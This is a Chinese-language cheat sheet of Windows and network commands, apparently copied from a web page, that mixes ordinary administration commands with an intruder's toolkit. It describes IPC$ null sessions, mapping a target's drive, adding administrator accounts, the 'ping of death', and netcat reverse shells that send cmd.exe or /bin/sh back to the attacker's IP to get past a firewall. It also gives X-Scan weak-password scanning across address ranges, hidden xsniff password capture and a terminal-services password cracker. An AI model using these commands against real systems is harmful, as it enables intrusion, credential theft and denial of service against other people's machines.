局域网内命令

局域网内命令大全

　　局域网dos命令集

　　net use ipipc$ " " /user:" " 建立IPC空链接

　　net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接

　　net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

　　net use h: ipc$ 登陆后映射对方C：到本地为H:

　　net use ipipc$ /del 删除IPC链接

　　net use h: /del 删除映射对方到本地的为H:的映射

　　net user 用户名 密码/add 建立用户

　　net user g

　　st /active:yes 激活g

　　st用户

　　net user 查看有哪些用户

　　net user 帐户名 查看帐户的属性

　　net localgroup ***istrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意：***istrator后加s用复数

　　net start 查看开启了哪些服务

　　net start 服务名 开启服务;(如:net start telnet，net start schedule)

　　net stop 服务名 停止某服务

　　net time 目标ip 查看对方时间

　　net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

　　net view 查看本地局域网内开启了哪些共享

　　net view ip 查看对方局域网内开启了哪些共享

　　net config 显示系统网络设置

　　net logoff 断开连接的共享

　　net pause 服务名 暂停某服务

　　net send ip "文本信息" 向对方发信息

　　net ver 局域网内正在使用的网络连接类型和信息

　　net share 查看本地开启的共享

　　net share ipc$ 开启ipc$共享

　　net share ipc$ /del 删除ipc$共享

　　net share c$ /del 删除C：共享

　　net user g

　　st 12345 用g

　　st用户登陆后用将密码改为12345

　　net password 密码 更改系统登陆密码

　　netstat -a 查看开启了哪些端口,常用netstat -an

　　netstat -n 查看端口的网络连接情况，常用netstat -an

　　netstat -v 查看正在进行的工作

　　netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

　　netstat -s 查看正在使用的所有协议使用情况

　　nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名(03前的为用户名)-注意：参数-A要大写

　　tracert -参数ip(或计算机名) 跟踪路由(数据包)，参数：“-w数字”用于设置超时间隔。

　　ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

　　ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

　　ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

　　tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

　　kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

　　del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

　　#2 二：

　　del /S /Q 目录 或用：rmdir /s /Q 目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

　　move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

　　fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令

　　at id号 开启已注册的某个计划任务

　　at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

　　at id号/delete 停止某个已注册的计划任务

　　at 查看所有的计划任务

　　at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

　　finger username @host 查看最近有哪些用户登陆……此处隐藏3668个字……p> 　　nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中，亦可起到传送文件作用

　　type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

　　本机上用：nc -l -p 本机端口

　　在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口*win2K

　　nc -e /bin/sh 本机IP -p 本机端口*linux,unix 反向连接突破对方主机的防火墙

　　本机上用：nc -d -l -p 本机端口< 要传送的文件路径及名称

　　在对方主机上用：nc -vv 本机IP 本机端口> 存放文件的路径及名称 传送文件到对方主机

　　备 注：

　　| 管道命令

　　< 或> 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令

　　@ 表示执行@后面的命令，但不会显示出来(后台执行);例：@dir c:winnt >> d:log.txt 意思是：后台执行dir，并把结果存在d:log.txt中

　　>与>>的区别">"指：覆盖;">>"指：保存到(添加到)。

　　如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

　　#8 八：

　　2、扫锚工具：xscan.exe

　　基本格式

　　xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

　　xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

　　检测项目

　　-active 检测主机是否存活

　　-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)

　　-port 检测常用服务的端口状态

　　-ftp 检测FTP弱口令

　　-p 检测FTP服务匿名用户写权限

　　-pop3 检测POP3-Server弱口令

　　-smtp 检测SMTP-Server漏洞

　　-sql 检测SQL-Server弱口令

　　-smb 检测NT-Server弱口令

　　-iis 检测IIS编码/解码漏洞

　　-cgi 检测CGI漏洞

　　-nasl 加载Nessus攻击脚本

　　-all 检测以上所有项目

　　其它选项

　　-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

　　-l 显示所有网络适配器

　　-v 显示详细扫描进度

　　-p 跳过没有响应的主机

　　-o 跳过没有检测到开放端口的主机

　　-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

　　-log 文件名 指定扫描报告文件名(后缀为：TXT或HTML格式的文件)

　　用法示例

　　xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

　　xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机

　　xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

　　#9 九：

　　3、命令行方式嗅探器: xsniff.exe

　　可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

　　参数说明

　　-tcp 输出TCP数据报

　　- p 输出P数据报

　　-icmp 输出ICMP数据报

　　-pass 过滤密码信息

　　-hide 后台运行

　　-host 解析主机名

　　-addr IP地址 过滤IP地址

　　-port 端口 过滤端口

　　-log 文件名 将输出保存到文件

　　-asc 以ASCII形式输出

　　-hex 以16进制形式输出

　　用法示例

　　xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

　　xsniff.exe -tcp - p -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和p信息并以ASCII格式输出

　　4、终端服务密码破解: tscrack.exe